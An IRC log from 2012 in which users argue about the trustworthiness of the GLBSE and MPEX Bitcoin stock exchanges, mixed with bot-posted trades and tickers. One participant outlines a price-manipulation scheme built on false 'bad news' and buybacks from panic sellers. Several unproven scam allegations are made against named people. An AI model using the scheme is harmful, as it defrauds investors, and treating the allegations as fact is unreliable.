06:04:07 yeah i think i did well Aug 31 06:04:07 https://bitcointalk.org/index.php?topic=35775.msg699659#msg699659 you can start there Ignatius-otc Aug 31 06:04:17 BTC-Mining why is the price currently low ? Aug 31 06:04:23 i also sold some very near 1.5 Aug 31 06:04:48 I would normally just do the work myself mp, but I have already went on a wild goose chase once today. To read about Chaang and his glbse "scandal". Wasn't worth my time and didn't prove Chaang dishonest or doing wrong. Aug 31 06:04:51 ok ty for the link Aug 31 06:05:20 The price of bitcoin more than doubled since it IPOed and mining difficulty has been raising accordingly Aug 31 06:05:23 Chaang-Noi is just front and center in pretty much any drama, but other than that it's not clearly proven he's dishonest. Aug 31 06:05:26 just a little silly at times. Aug 31 06:05:43 Thus price lowered, however Gigamining's rig should get upgraded. Aug 31 06:05:43 BTC-Mining and we should discount this for what reason ? Aug 31 06:05:52 means a great deal coming from you mircea Aug 31 06:05:59 i would ahte for anyone to think we were friends Aug 31 06:06:14 lol Aug 31 06:06:17 yeah im very happy with giga stock Aug 31 06:08:11 <@assbot> GIGAMINING [1@1BTC] paid: 0.41490096 BTC. Last price: 0.82 BTC. Capital gain: -0.18 BTC. Total: 0.23490096 BTC. (23.5%) Aug 31 06:08:25 0.41 paid, -0.18 capital gain, net +23.5% Aug 31 06:08:37 Gigamining's price at IPO wasn't bad Aug 31 06:08:42 as long as we're making scenarios, you could have bought at 1 sold at 1.5 Aug 31 06:08:44 some people did. Aug 31 06:08:55 aye, and some people overpaid the stock Aug 31 06:08:58 more's the point, on any stock chart you can make these imaginary paths where you win money no matter what happens. Aug 31 06:09:09 with the benefit of knowing the future, that's grea.t Aug 31 06:09:30 Indeed, you could, assuming you can foresee the future... unfortunatly you can't Aug 31 06:10:23 im glad im friends with james :) Aug 31 06:10:30 and let me in on the ipo Aug 31 06:10:42 it was public on the forums wasn't it. Aug 31 06:11:01 hmm... Aug 31 06:11:59 ;;ticker Aug 31 06:12:00 Best bid: 10.78001, Best ask: 10.79, Bid-ask spread: 0.00999, Last trade: 10.78, 24 hour volume: 29529, 24 hour low: 10.6, 24 hour high: 10.907 Aug 31 06:18:16 [GLBSE] [BITBOND] 2 @ 0.4693 = 0.9386 BTC [-] Aug 31 06:19:50 mircea_popescu: what measures are in place on mpex to prevent a lif.* like asset from defaulting in the way the thread you linked to me describes? Aug 31 06:20:31 [GLBSE] [V.HRL] 1 @ 1 BTC Aug 31 06:20:39 does mpex have investment funds? if so, when they are poorly managed and lose most/all btc...how would this play out any differently if the exchange were mpex instead of glbse Aug 31 06:20:40 there is not money traded on mpex so nothing can be lost Aug 31 06:20:42 i don't allow random people to list. Aug 31 06:20:50 Chaang-Noi now why do you insist to lie on the matter ? Aug 31 06:21:13 not a lie, but an exageration to absurdity Aug 31 06:21:20 clearly a few btc is on your exchange Aug 31 06:21:22 [GLBSE] [BFLS] 2 @ 1.09 = 2.18 BTC [-] Aug 31 06:21:24 [GLBSE] [BFLS] 1 @ 1.099 BTC [+] Aug 31 06:21:29 but you are aware that glbse did something like 20% of the satoshi dice volume, right ? Aug 31 06:21:35 so yes you can be scammed too Aug 31 06:21:37 mostly because... it has no investors. Aug 31 06:21:43 of course i can be scammed too. Aug 31 06:21:59 the difference is that i haven't been. Aug 31 06:22:04 glbse took 20% of the volume of a stock on your exchange? oh lol Aug 31 06:22:07 just like any wife could be a whore. she has the equipment. Aug 31 06:22:12 is there an actual third party blockchain like way to verify any of your volume claims mp? Aug 31 06:22:12 the ideea is that some are and some aren't. Aug 31 06:22:16 thats pretty funny stat Aug 31 06:22:24 Ignatius-otc you could try twitter i guess ? Aug 31 06:22:40 twitter? as proof of volume? so...the same as glbse? Aug 31 06:22:44 why would 20% not wnt to use your exchange and pick glbse over it? oh wiat, never mind :) Aug 31 06:22:54 [GLBSE] [NYAN.C] 1 @ 0.45 BTC [+] Aug 31 06:22:56 Chaang-Noi because they don't have 20 btc, mostly. Aug 31 06:23:06 Ignatius-otc how would you construct proof of volume ? Aug 31 06:23:08 in an ideal world ? Aug 31 06:23:21 trusted third party verification Aug 31 06:23:33 there's not that many third parties that i trust. Aug 31 06:23:37 just generally aksing though, your statements seem like they could alle asily apply to any exchange,even yours Aug 31 06:23:43 [MPEX] [S.MPOE] 43000 @ 0.00039724 = 17.0813 BTC [-] Aug 31 06:23:47 which specifically ? Aug 31 06:23:48 apply easily* Aug 31 06:24:05 mainly the collusion thing is what got me to chime in and the fun here Aug 31 06:24:12 a. well here's the thing : Aug 31 06:24:17 i still havent seen anything suggesting glbse is in collusion with defaulting assets Aug 31 06:24:42 [GLBSE] [FDBF] 1 @ 0.14 BTC [-] Aug 31 06:25:19 you got neighbourhood A, where there never was a violent crime. you got neighbourhood B, where about half the citizens routinely get hauled off to prison on various violent charges. Aug 31 06:25:25 now... where do you make your home ? Aug 31 06:25:45 sure, in principle crime is crime, it can happen anywhere, innocent till proven guilty and all that. Aug 31 06:25:49 but, where do you make your home ? Aug 31 06:25:56 that wasn't my concern Aug 31 06:26:03 well that was the extent of my argument. Aug 31 06:26:13 my concern is when you alluded multiple times that glbse staff are/were involved in scams Aug 31 06:26:19 shit happens too many times it's either incompetence or collusion. Aug 31 06:26:27 This isn't about making your home tho, it's about making money Aug 31 06:26:49 BTC-Mining no, the making money part has been longresolved. anyone with any capital and any sense goes wherwe the volume is. Aug 31 06:26:57 we're on to discussing the irrational part, of homemaking. Aug 31 06:27:03 and although GLBSE had many scam/default, when chosen correctly, the assets pay a lot more. Aug 31 06:27:03 that being the last argument left, really. Aug 31 06:27:17 BTC-Mining do you know which is the highest yield asset on glbse ? Aug 31 06:27:29 So people only go where the volume is eh? Guess we should all strictly invest in government bonds then Aug 31 06:27:41 The highest were pirate's passthrough Aug 31 06:27:44 nope Aug 31 06:27:46 try again ? Aug 31 06:28:08 hmm... OBSI.HRPT currently Aug 31 06:28:11 mnope Aug 31 06:28:17 want a third or are you bored ? Aug 31 06:28:27 Bored Aug 31 06:28:34 !pl mpoe.etf 0.1 Aug 31 06:28:34 Requesting data from GLBSE (might take a while). Aug 31 06:28:52 gee they take this beta thing seriously. Aug 31 06:28:52 MPOE.ETF [1@0.1BTC] paid: 0.0104835 BTC. Last price: 1.3 BTC. Capital gain: 1.2 BTC. Total: 1.2104835 BTC. (1210.5%) Aug 31 06:29:11 [GLBSE] [DMC] 1 @ 0.0622 BTC [-] Aug 31 06:29:23 To be clear I personally am not arguing that any glbse asset is a sound investment, I just want to make sure the exchange itself is reputable. Aug 31 06:29:32 Ignatius-otc how would you do that ? Aug 31 06:29:59 similar to feedback systems all voer the internet is how I personally went about it Aug 31 06:30:04 i regard it as disreputable. i might just be biased. some people regard it as reputable. course they don't tend to disclose their ownership interest in it. Aug 31 06:30:07 what can you do ? Aug 31 06:30:24 and in doing so, found absolutely no evidence glbse is up to no good, same for chaang, yet I watch you sit here and bash the fk out of these things pretty frequently... Aug 31 06:30:31 and that's strictly because it went up in value very fast... Aug 31 06:30:52 unfortunatly such raises are hard to foresee =/ Aug 31 06:30:59 BTC-Mining dude. you don't like volume, you don't like price appreciation... is there something you can put your finger on rationally or are you just emotionally invested in this discussion ? Aug 31 06:31:57 I just have a problem with you bashing everything but MPEX randomly spouting as fact things you haven't researched or have proof for. Like claiming GIGAMINING devalued almost 50% when it IPOed at 1 and not 1.5 Aug 31 06:32:18 BTC-Mining it ipoed at 1 for a select few that had the money. and it did not ipo on glbse. Aug 31 06:32:21 so this is really nonsense. Aug 31 06:32:41 other than that, i've backed up everyrthing i said with hard fact, which in general seems to be easily discounted for some sentiment of "i know better". Aug 31 06:33:06 [MPEX] [S.MPOE] 2737 @ 0.00039724 = 1.0872 BTC [-] Aug 31 06:33:08 [MPEX] [S.MPOE] 2885 @ 0.00039781 = 1.1477 BTC [+] Aug 31 06:33:09 [MPEX] [S.MPOE] 10378 @ 0.00039795 = 4.1299 BTC [+] Aug 31 06:33:55 in the immortal words of jwu, Aug 27 17:34:17 mircea_popescu: as with so many things, niot just finance, ego becomes involved and bad decisions are made Aug 31 06:34:15 that;'s pretty much the gist of it. everyoen thinks "they know better". it's a very easy thing to get. Aug 31 06:34:47 but that is not the case for my interaction with you mp. it consisted of you making claims bashing others which you never backed up. just fyi Aug 31 06:34:50 So, MPOE.ETF made 1210% so far. Tell me, how much has S.MPOE made on MPEX? Aug 31 06:35:16 BTC-Mining the same, roguhly ? Aug 31 06:35:27 Ignatius-otc speciffically, such a claim ? Aug 31 06:35:40 I thought it went up about 3-4 times? Aug 31 06:35:41 cause you were calling them claims "alusions" a few lines back. Aug 31 06:35:59 Implying GLBSE is colluding to scam investors. Aug 31 06:36:02 [MPEX] [S.MPOE] 22600 @ 0.00039714 = 8.9754 BTC [-] Aug 31 06:36:04 BTC-Mining yes. the etf had dibbs on the early distribution, which was auctioned in fixed blocks, if you recall ? Aug 31 06:36:11 You linked me to a thread about a GLBSE asset default. Aug 31 06:36:31 Ignatius-otc that implication is sufficiently borne by the extraordinary concentration of scam assets there. Aug 31 06:36:41 I understand that opinion Aug 31 06:36:47 but you portray that opinion here as fact Aug 31 06:36:49 if you don't think so, that's fine, but you can't say "i never backed it up". i have. Aug 31 06:37:01 the concentration is a fact. Aug 31 06:37:22 [GLBSE] [BITBOND] 1 @ 0.4693 BTC [-] Aug 31 06:37:23 [GLBSE] [BITBOND] 9 @ 0.4694 = 4.2246 BTC [+] Aug 31 06:37:24 [GLBSE] [BITBOND] 30 @ 0.4695 = 14.085 BTC [+] Aug 31 06:37:29 By that logic BTC is horrible, as it has a high concentration of scams...? Aug 31 06:37:40 i never saw a btc scam. Aug 31 06:37:47 all the btc i ever received are safely in my wallet. Aug 31 06:37:55 if a good portion of the btc received would evaporate from my wallet Aug 31 06:38:01 i'd have been out of here long, long ago. Aug 31 06:38:14 [GLBSE] [NASTY] 1 @ 0.535 BTC [+] Aug 31 06:38:16 [GLBSE] [NASTY] 2 @ 0.54 = 1.08 BTC [+] Aug 31 06:38:17 [GLBSE] [NASTY] 9 @ 0.55 = 4.95 BTC [+] Aug 31 06:38:17 [GLBSE] [NASTY] 1 @ 0.559 BTC [+] Aug 31 06:38:19 [GLBSE] [NASTY] 10 @ 0.56 = 5.6 BTC [+] Aug 31 06:38:20 [GLBSE] [NASTY] 17 @ 0.57 = 9.69 BTC [+] Aug 31 06:40:15 now specifically, as to the collusion discussion, quote defrauded investor teek : " I am pretty sure even Nefario gave him the nod a few times in posts." Aug 31 06:40:21 you read this Ignatius-otc ? Aug 31 06:40:47 yeah, Im reading it all. Don't get me wrong mp I am open minded and willing to put aside ego. Aug 31 06:40:52 I got banned from btcst for the 12th time lol Aug 31 06:41:20 so. there's no complete and definitive proof. thinking about it i can actually see the angle for incompetence possibly prevail over the actual malfeasance angle. Aug 31 06:41:21 However, same thread, if you look at what GLBSE reps, i.e. nefario, actually says...it's all the same old moderator babysitting stuff. Nothing dishonest that I have seen yet. Aug 31 06:41:33 Ignatius-otc most of those posts were deleted however. Aug 31 06:41:39 that I would believe mp Aug 31 06:41:53 seem to still have the vanishing post problem even today Aug 31 06:42:42 now, a simple point of fact : nobody can create shares on mpex. this offers the investor some guarantees against dillution, at least. Aug 31 06:43:25 Same for GLBSE if there's a requirement to issue shares. Aug 31 06:43:28 may that manipulate the price of their own asset freely on the market? if so, it completely negates the benefit of no dilution Aug 31 06:43:30 mpex contracts are actually signed, this guarantees their integrity, and offers the investor some further safety. Aug 31 06:43:41 Most voting assets will have 51% required to issue new bonds Aug 31 06:43:42 Ignatius-otc what do you mean ? Aug 31 06:43:53 Fixed rate bond will have 0% required to issue more Aug 31 06:43:58 instead of doubling shares outstanding, half share value Aug 31 06:44:12 same overall goals can be accomplished Aug 31 06:44:16 Ignatius-otc i don't get it. he's selling his own shares cheap. how is this dillution ? Aug 31 06:44:22 i don't follow this logic. Aug 31 06:44:23 no no, sorry Aug 31 06:44:38 I am referencing only your comment about mpex doesnt allow issuing new shares as easily as glbse Aug 31 06:44:41 BTC-Mining im not even sure what's the meaning of having a voting system. Aug 31 06:44:53 if an mpex asset issuer can manipulate the price of his own asset,then the protection is lost Aug 31 06:44:56 look at how diablo messed up his contract/early investors in based on that. Aug 31 06:45:08 Ignatius-otc explain this manipulation. Aug 31 06:46:41 Diablo just exchange his IPOing shares for ever changing rates with other shares. Aug 31 06:46:55 BTC-Mining fact remains if you put in a 1 btcf in his ipo you are now screwed. Aug 31 06:47:06 Effectively, if he offers more shares for other asset's shares, he devalued all his shares Aug 31 06:47:08 which sort-of negates the benefit of putting another btc in giga's ipo and having made 20% Aug 31 06:47:16 Indeed, where are you coming at with that? Aug 31 06:47:36 i'm coming at the fact that the issuer needs to be trusted to not dillute on glbse. Aug 31 06:48:04 The issuer can dilute his own asset, not other assets Aug 31 06:48:08 ... Aug 31 06:48:31 the market price of low liquidity assets can be manipulated by simply buying out asks and filling bids sufficiently to where ones own orders are all that remain. if the issuer did this instead of dilution i believe he could continually "flip" the shares in a way similar to if he had just kept printing shares with a plummeting share price Aug 31 06:48:48 but im no expert, if you say its impossible to dilute in any way ill believe ya;) Aug 31 06:48:51 You're assuming it's a net loss overall like everyone put 1 BTC in both assets... Aug 31 06:48:59 which is not true... Aug 31 06:49:00 Ignatius-otc let's run a scenario. i own 90% of the float, share trades at 10. now i do what, sell 5% of the float, share goes to 5 ? Aug 31 06:49:24 BTC-Mining im just saying you have no rational way to pick. and one flower that made 20% is scarce compensation for all the duds. Aug 31 06:49:34 read a little the forum, the people are quite frustrated. Aug 31 06:49:46 there's very good reasons why pretty much everyone switched ship this month, you see ? Aug 31 06:51:12 I went, over the past month, from a 1200 portfolio value to a 1500 portfolio value, on GLBSE... Aug 31 06:51:33 There's ways to pick good stocks from the bad ones Aug 31 06:52:10 sell shares, drop price, buyback panic sell, repeat. you never diluted in a traditional sense, but the result would be a fleecing of investors and a chart with a similar appearance...always trending down. So mp you are saying no mpex asset has ever defaulted? wow Aug 31 06:52:31 [GLBSE] [FUTUREFUND] 1 @ 0.00012189 BTC [+] Aug 31 06:52:39 Ignatius-otc i am saying that, yes. so far none has. Aug 31 06:52:55 this theory about force price down etc is (possibly) what pirate thought he might accomplish Aug 31 06:53:00 how long has mpex been active Aug 31 06:53:08 things don't work out that way. this particular attack would made everyone rich irl if it really worked. Aug 31 06:53:10 MPEX has almost no assets, it's an options trading. As for assets, there's S.DICE, Mpex itself, giga.etf and I think brendio's funds? Aug 31 06:53:12 Ignatius-otc opened in march Aug 31 06:53:12 [GLBSE] [FUTUREFUND] 1 @ 0.00012189 BTC [+] Aug 31 06:53:36 BTC-Mining the total market value of mpex listed assets is > 10x total mkt value of glbse listed assets. Aug 31 06:53:44 [GLBSE] [FUTUREFUND] 1 @ 0.00012189 BTC [+] Aug 31 06:53:45 just because they're better they will necessarily be fewer. Aug 31 06:54:17 [GLBSE] [FUTUREFUND] 1 @ 0.00012189 BTC [+] Aug 31 06:54:31 That's exactly why there was no default, the market allows only few companies Aug 31 06:54:40 well ofcourse. Aug 31 06:54:52 [GLBSE] [FUTUREFUND] 1 @ 0.00012189 BTC [+] Aug 31 06:54:56 i always said, i'd rather not list anything at all than list dubious offerings. Aug 31 06:55:13 What do you not understand in the fact GLBSE is a open market where anyone can issue? Aug 31 06:55:33 i understand it, i also think it's beyond stupid. Aug 31 06:55:55 Well bitcoin is technically an open, unregulated currency too... Aug 31 06:56:07 no, it is not. Aug 31 06:56:13 it's not a currency where anyone can make a bitcoin. Aug 31 06:56:22 bitcoin is the paragon of closeness, hence it's value. Aug 31 06:56:29 Not unregulated in that sense god dammit Aug 31 06:56:31 closedness Aug 31 06:56:35 mp if you can please elaborate on why you said "things don't work out that way. this particular attack would made everyone rich irl if it really worked.". this attack does work at times, i have seen penny stock scams use it Aug 31 06:56:48 Unregulated as no one decides of what is and is not appropriate in transactions Aug 31 06:56:50 well that's the exact sense in which glbse is unregulated : anyone can make a stock and anyone can then dillute it to hell Aug 31 06:57:01 Ignatius-otc you mean a pump and dump ? Aug 31 06:57:04 and people were trying to do a P2P stock exchange, unregulated too of course Aug 31 06:57:26 "anyone can make a stock and anyone can then dillute it to hell" Aug 31 06:57:59 Which doesn't mean it's all bad stocks Aug 31 06:58:03 no, I mean I ahve witnessed 2 types of penny stock scams. One, where they dilute by continually printing enw shares and selling off until the price per share is some small fraction of a cent. then, they restructure and repeat the process. another type, doesn't dilute by printing shares, but by the method i have tried to desciribe to you. Aug 31 06:58:11 BTC-Mining it just means there's no rational way of pickingthem. Aug 31 06:58:23 both were highly successful so I wondered why you called the one method unsuccessful Aug 31 06:58:31 Ignatius-otc i might be either thick skulled or missing something here. Aug 31 06:58:47 of course there fucking is a way to pick them up, you can just look up the issuer Aug 31 06:59:00 Gigamining being an easy example Aug 31 06:59:09 BTC-Mining nd diablo ? Aug 31 06:59:17 burt anyway, let's see this thing. company has 1mn shares, i own 90mn of them, it trades at 10 currently. Aug 31 06:59:26 now, i dump 10mn of my shares, price goes all the way to 5 Aug 31 06:59:26 Diablo had lots of telltale signs that it was nonsense Aug 31 06:59:36 i rebuy 10 million of my shares, price goes all the way to 9. Aug 31 06:59:57 i got 70mn for the shares i sold, i bought them back for 60 mn, hence 10 mhn profit, is this the system Ignatius-otc ? Aug 31 07:00:18 The first being that he needed a 1 million BTC IPO Aug 31 07:00:22 [GLBSE] [GOLD] 5 @ 0.00911 = 0.0456 BTC [-] Aug 31 07:00:28 BTC-Mining so you earnestly believe you can pick them. more power to you. in my experience neither timers nor pickers make money irl, but you're welcome to it. Aug 31 07:00:33 then that he started to trade assets for shares Aug 31 07:00:39 roughly yes. I was merely trying to say prohibiting the printing of shares does not mean an issuer can not dilute. Aug 31 07:00:48 I have yet to make a loss on any GLBSE asset Aug 31 07:01:04 aside from pirate debt my bot picked up for cheap, same here BTC-Mining Aug 31 07:01:09 Ignatius-otc but looky : my position to begin with : 900mn worth of shares. my position to end with : 60mn in cash and 810 mn worth of shares Aug 31 07:01:12 i have... lost...money. Aug 31 07:01:26 BTC-Mining i believe you. Aug 31 07:01:35 i'm not saying it can't happen. im just talking statistics. Aug 31 07:01:55 that is ebcause you demand the price is taken to arbitrary points. in some markets the price is whatever you set it to be Aug 31 07:02:01 I stay informed on the issuers and latest development, I buy when there's an opportunity, sell back before it's too late. Aug 31 07:02:24 [MPEX] [F.GIGA.ETF] 6100 @ 0.00080907 = 4.9353 BTC [+] Aug 31 07:02:25 BTC-Mining it might be the case that the cost of your research in terms of skill*time exceeds your profits by a significant margin. Aug 31 07:02:25 [MPEX] [S.MPOE] 2999 @ 0.00039203 = 1.1757 BTC [-] Aug 31 07:02:35 [GLBSE] [GOLD] 2 @ 0.00905 = 0.0181 BTC [-] Aug 31 07:02:44 Ignatius-otc but you would have to set it to be something. Aug 31 07:02:52 I could hardly do as much on MPEX which only IPOs high rated companies like SatoshiDice. The price seems too stable. Aug 31 07:03:01 Plus dividends are much lower Aug 31 07:03:15 well obviously the higher the volumes the stabler the prices. Aug 31 07:03:18 this seems to me a d'uh. Aug 31 07:03:29 Indeed. Aug 31 07:03:35 [GLBSE] [GOLD] 36 @ 0.009 = 0.324 BTC [-] Aug 31 07:03:38 tho for instance if you made money on the recent giga move downwards on glbse Aug 31 07:03:42 o wait, you can't short on glbse Aug 31 07:03:58 heh. so, if you had a margined acct and shorted ON MPEX you could have made a lot more there. Aug 31 07:03:58 Indeed Aug 31 07:04:13 shorting, options, etc. Aug 31 07:04:14 [GLBSE] [NASTY] 1 @ 0.4101 BTC [-] Aug 31 07:04:22 shorting and options aren't the same thing. Aug 31 07:04:23 Going to be implemented on GLBSE Aug 31 07:04:32 are you talking about the future again ? Aug 31 07:04:33 [GLBSE] [OBSI.HRPT] 5 @ 0.1048899 = 0.5244 BTC [+] Aug 31 07:04:44 that's why I put them in a list... because they're not the same Aug 31 07:04:58 [GLBSE] [PLATINUM] 3 @ 0.0090501 = 0.0272 BTC [-] Aug 31 07:05:03 mk. so at some later point in the future you shall have profited by the drop last week. Aug 31 07:05:18 No, but it will become a possibility Aug 31 07:05:25 right. Aug 31 07:05:35 you know what the cost of opportunity is , right ? Aug 31 07:05:49 [GLBSE] [ZETA-MINING] 1 @ 0.122 BTC [-] Aug 31 07:06:10 nay, I do not know anything about terms Aug 31 07:06:32 [GLBSE] [BBBB] 116 @ 0.0002125 = 0.0247 BTC [-] Aug 31 07:06:38 [GLBSE] [OBSI.1MHS] 10 @ 0.0935 = 0.935 BTC [+] Aug 31 07:06:38 [GLBSE] [OBSI.1MHS] 11 @ 0.0935 = 1.0285 BTC [+] Aug 31 07:06:43 You have 20 shares. You sell 10 shares for 1 BTC each. "bad news" hits, and now you offer your remaining 10 shares at 0.5BTC. You buyback shares from paic sellers for a 25-75% discount. Took in 10 BTC from the original sale of 10 shares, used less than 10 BTC to buy back those 10 shares when a panic sell occured. Repeat the process...our price is at 0.5 BTC now, sell 10 shares for 0.5 BTC. "bad news", your remaining 10 shares are Aug 31 07:06:58 [GLBSE] [RAREEARTH] 18 @ 0.0095 = 0.171 BTC [-] Aug 31 07:07:49 [GLBSE] [BITBOND] 1 @ 0.4053 BTC [-] Aug 31 07:08:07 [GLBSE] [OBSI.1MHS] 24 @ 0.08 = 1.92 BTC [-] Aug 31 07:08:08 [GLBSE] [JTME] 12 @ 0.9448 = 11.3376 BTC [+] Aug 31 07:08:11 [GLBSE] [PUREMINING] 5 @ 0.088 = 0.44 BTC [-] Aug 31 07:08:25 [GLBSE] [JTME] 4 @ 0.9448 = 3.7792 BTC [+] Aug 31 07:08:29 [GLBSE] [OBSI.1MHS] 3 @ 0.071 = 0.213 BTC [-] Aug 31 07:08:37 [GLBSE] [PIMP] 2 @ 0.153 = 0.306 BTC [-] Aug 31 07:08:38 Ignatius-otc this would require you actually releasing false information or somesuch ? sort of like an insider trading job ? Aug 31 07:09:05 [GLBSE] [SILVER] 6 @ 0.009022 = 0.0541 BTC [-] Aug 31 07:09:10 yes, that is how I have seen it done in the penny stock world. it's dilution really...but without printing more shares Aug 31 07:09:26 [GLBSE] [OBSI.HRPT] 14 @ 0.1048899 = 1.4685 BTC [+] Aug 31 07:09:28 [GLBSE] [OBSI.HRPT] 5 @ 0.104989 = 0.5249 BTC [+] Aug 31 07:09:35 yeah well, a. i haven't seen it happen and b. i don't see i'd stand for it. Aug 31 07:09:43 [GLBSE] [DMC] 1 @ 0.0622 BTC [-] Aug 31 07:10:00 [GLBSE] [OBSI.HRPT] 1 @ 0.104989 BTC [+] Aug 31 07:10:11 [GLBSE] [BIB.BVPS] 1 @ 0.0035 BTC [-] Aug 31 07:10:31 moreover, the fact that the owner retains a majority of shares seems to make this plan a losing proposition. Aug 31 07:10:59 (contracts are written so the owner can never sell more than half is shares, i dunno if you read them) Aug 31 07:11:00 [GLBSE] [OBSI.HRPT] 1 @ 0.104989 BTC [+] Aug 31 07:11:21 [GLBSE] [OBSI.HRPT] 12 @ 0.104989 = 1.2599 BTC [+] Aug 31 07:12:23 [GLBSE] [BLUECHIP] 11 @ 0.1 = 1.1 BTC Aug 31 07:13:35 [GLBSE] [NYAN.C] 1 @ 0.45 BTC [+] Aug 31 07:15:15 [GLBSE] [PUREMINING] 2 @ 0.09299999 = 0.186 BTC [+] Aug 31 07:16:31 [GLBSE] [NASTY] 5 @ 0.5699 = 2.8495 BTC [+] Aug 31 07:17:37 [GLBSE] [PAJKA.BOND] 1 @ 0.06 BTC [+] Aug 31 07:18:13 [GLBSE] [ASICMINER] 2 @ 0.115 = 0.23 BTC [+] Aug 31 07:18:38 [GLBSE] [ASICMINER] 8 @ 0.11748 = 0.9398 BTC [+] Aug 31 07:39:40 [GLBSE] [FPGAMINING] 1 @ 0.83 BTC [+] Aug 31 07:41:41 [MPEX] [S.MPOE] 18200 @ 0.00039068 = 7.1104 BTC [-] Aug 31 07:41:42 [MPEX] [S.MPOE] 57200 @ 0.00039046 = 22.3343 BTC [-] Aug 31 07:41:44 [MPEX] [S.MPOE] 58000 @ 0.00039018 = 22.6304 BTC [-] Aug 31 07:41:44 [MPEX] [S.MPOE] 40635 @ 0.00038978 = 15.8387 BTC [-] Aug 31 07:41:45 [MPEX] [S.MPOE] 51728 @ 0.00038815 = 20.0782 BTC [-] Aug 31 07:41:46 [MPEX] [S.MPOE] 2450 @ 0.00038723 = 0.9487 BTC [-] Aug 31 07:41:47 [MPEX] [S.MPOE] 34500 @ 0.00038705 = 13.3532 BTC [-] Aug 31 07:41:48 [MPEX] [S.MPOE] 18289 @ 0.00038633 = 7.0656 BTC [-] Aug 31 07:41:50 [MPEX] [S.MPOE] 17000 @ 0.00038544 = 6.5525 BTC [-] Aug 31 07:41:51 [MPEX] [S.MPOE] 4100 @ 0.00038524 = 1.5795 BTC [-] Aug 31 07:41:52 [MPEX] [S.MPOE] 11084 @ 0.00038454 = 4.2622 BTC [-] Aug 31 07:41:53 [MPEX] [S.MPOE] 36814 @ 0.0003834 = 14.1145 BTC [-] Aug 31 07:44:27 [GLBSE] [NYAN.B] 200 @ 1 = 200 BTC [+] Aug 31 07:50:54 [MPEX] [S.DICE] 16000 @ 0.0034 = 54.4 BTC [+] Aug 31 07:51:45 Hi brendio Aug 31 07:51:53 hi Aug 31 07:54:12 If you end up needing anything from me as a bond holder let me know. I'm not sure what information is being requested by pirate. Aug 31 07:55:14 slow glbse is slow Aug 31 07:55:17 [MPEX] [S.BVPS] 450 @ 0.00348611 = 1.5687 BTC [-] Aug 31 07:55:18 [MPEX] [S.BVPS] 50 @ 0.00344763 = 0.1724 BTC [-] Aug 31 07:55:26 [MPEX] [S.MPOE] 40128 @ 0.00038485 = 15.4433 BTC [+] Aug 31 07:56:41 [MPEX] [F.GIGA.ETF] 8318 @ 0.00080907 = 6.7298 BTC [+] **** BEGIN LOGGING AT Fri Aug 31 15:31:00 2012 Aug 31 15:31:03 ;;ticker Aug 31 15:31:04 Best bid: 10.251, Best ask: 10.3, Bid-ask spread: 0.04900, Last trade: 10.3, 24 hour volume: 38288, 24 hour low: 10.2, 24 hour high: 10.8785 Aug 31 15:31:10 o hey, going down are we. Aug 31 15:34:05 uhuh Aug 31 15:35:11 still very low volume tho Aug 31 15:41:57 [GLBSE] [GIGAMINING] 5 @ 0.8499 = 4.2495 BTC [+] Aug 31 15:42:32 [GLBSE] [GIGAMINING] 10 @ 0.85 = 8.5 BTC [+] Aug 31 15:43:03 [GLBSE] [GIGAMINING] 6 @ 0.867899 = 5.2074 BTC [+] Aug 31 15:44:01 [GLBSE] [GIGAMINING] 10 @ 0.868 = 8.68 BTC [+] Aug 31 15:44:40 [GLBSE] [BITBOND] 4 @ 0.46 = 1.84 BTC [+] Aug 31 15:45:12 [GLBSE] [BITBOND] 9 @ 0.4695 = 4.2255 BTC [+] Aug 31 15:45:47 [GLBSE] [BITBOND] 9 @ 0.4695 = 4.2255 BTC [+] Aug 31 15:57:18 [GLBSE] [YABMC] 83 @ 0.1176 = 9.7608 BTC [+] Aug 31 16:00:47 ;;ticker Aug 31 16:00:48 [GLBSE] [OBSI.HRPT] 2 @ 0.104988 = 0.21 BTC [-] Aug 31 16:00:48 Best bid: 10.26, Best ask: 10.3, Bid-ask spread: 0.04000, Last trade: 10.3, 24 hour volume: 38723, 24 hour low: 10.2, 24 hour high: 10.87699 Aug 31 16:01:55 [GLBSE] [BIB.PIRATE] 1 @ 0.17 BTC [+] Aug 31 16:03:34 [GLBSE] [COGNITIVE] 6 @ 0.6596 = 3.9576 BTC [+] Aug 31 16:04:57 [GLBSE] [BIB.PIRATE] 10 @ 0.27573 = 2.7573 BTC [+] Aug 31 16:06:10 http://www.youtube.com/watch?v=KNE5C0X7Fzs << for adults only. Aug 31 16:06:30 [GLBSE] [FOO.PPPPT] 5 @ 0.21 = 1.05 BTC [+] Aug 31 16:07:58 [GLBSE] [OBSI.HRPT] 146 @ 0.104988 = 15.3282 BTC [-] Aug 31 16:08:00 [GLBSE] [OBSI.HRPT] 139 @ 0.104989 = 14.5935 BTC [+] Aug 31 16:14:09 [GLBSE] [FOO.PPPPT] 5 @ 0.22 = 1.1 BTC [+] Aug 31 16:14:10 [GLBSE] [FOO.PPPPT] 5 @ 0.23 = 1.15 BTC [+] Aug 31 16:14:12 [GLBSE] [FOO.PPPPT] 5 @ 0.24 = 1.2 BTC [+] Aug 31 16:14:12 [GLBSE] [FOO.PPPPT] 5 @ 0.25 = 1.25 BTC [+] Aug 31 16:14:13 [GLBSE] [FOO.PPPPT] 5 @ 0.26 = 1.3 BTC [+] Aug 31 16:14:14 [GLBSE] [FOO.PPPPT] 5 @ 0.27 = 1.35 BTC [+] Aug 31 16:14:16 [GLBSE] [FOO.PPPPT] 5 @ 0.28 = 1.4 BTC [+] Aug 31 16:14:17 [GLBSE] [FOO.PPPPT] 5 @ 0.29 = 1.45 BTC [+] Aug 31 16:14:18 [GLBSE] [FOO.PPPPT] 5 @ 0.3 = 1.5 BTC [+] Aug 31 16:14:43 [GLBSE] [TYGRR.BOND-P] 45 @ 0.3 = 13.5 BTC [+] Aug 31 16:14:44 [GLBSE] [TYGRR.BOND-P] 336 @ 0.31 = 104.16 BTC [+] Aug 31 16:26:53 [GLBSE] [FPGAMINING] 8 @ 0.829999 = 6.64 BTC [-] Aug 31 16:32:35 If anyone want to sell BDK, I am buying then for 0.12 each :) Aug 31 16:33:58 [GLBSE] [TYGRR.BOND-P] 20 @ 0.336105 = 6.7221 BTC [+] Aug 31 16:34:00 [GLBSE] [CIUCIU.BOND] 5 @ 0.1 = 0.5 BTC [+] Aug 31 16:35:39 [MPEX] [S.MPOE] 49097 @ 0.00039101 = 19.1974 BTC [+] Aug 31 16:35:40 [MPEX] [S.MPOE] 13103 @ 0.0003912 = 5.1259 BTC [+] Aug 31 16:36:18 [GLBSE] [TEEK.USD] 13 @ 0.08999 = 